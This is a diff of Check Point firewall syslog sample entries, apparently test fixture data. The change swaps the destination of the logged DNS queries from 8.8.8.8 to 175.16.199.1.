-<134>1 2020-03-29T16:52:38Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d256,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500758"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"36241"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:52:38Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d256,0x1,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500758"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33708"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:52:39Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d257,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500759"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"39041"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:52:40Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d258,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500760"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"48567"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:52:40Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d258,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500760"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53988"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:52:40Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d258,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500760"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"49354"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:52:48Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d260,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500768"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56759"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:52:48Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d260,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500768"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"46081"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:52:49Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d261,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500769"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"49980"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:52:49Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d261,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500769"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"34984"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:52:50Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d262,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500770"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"58365"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:52:38Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d256,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500758"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"41490"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:52:38Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d256,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500758"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"36241"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:52:38Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d256,0x1,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500758"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33708"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:52:39Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d257,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500759"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"39041"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:52:40Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d258,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500760"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"48567"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:52:40Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d258,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500760"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53988"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:52:40Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d258,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500760"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"49354"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:52:48Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d260,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500768"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56759"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:52:48Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d260,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500768"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"46081"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:52:49Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d261,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500769"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"49980"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:52:49Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d261,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500769"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"34984"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:52:50Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d262,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500770"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"58365"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:52:53Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d265,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.1"; log_delay:"1585500773"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"34901"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:52:54Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d266,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.1"; log_delay:"1585500774"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52650"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:52:59Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d26b,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500779"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"35306"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:53:00Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d26c,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500780"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"49488"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:53:00Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d26c,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500780"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"46461"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:52:59Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d26b,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500779"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"35306"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:53:00Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d26c,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500780"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"49488"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
